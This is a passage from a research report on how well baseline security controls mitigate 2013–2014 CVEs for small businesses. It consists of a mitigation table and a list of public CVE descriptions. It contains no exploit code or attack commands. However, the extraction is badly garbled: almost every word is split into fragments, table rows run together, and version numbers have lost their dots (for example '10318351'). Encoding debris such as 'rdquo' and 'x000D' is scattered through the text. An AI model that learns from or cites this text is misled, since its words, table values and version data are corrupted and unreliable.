ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
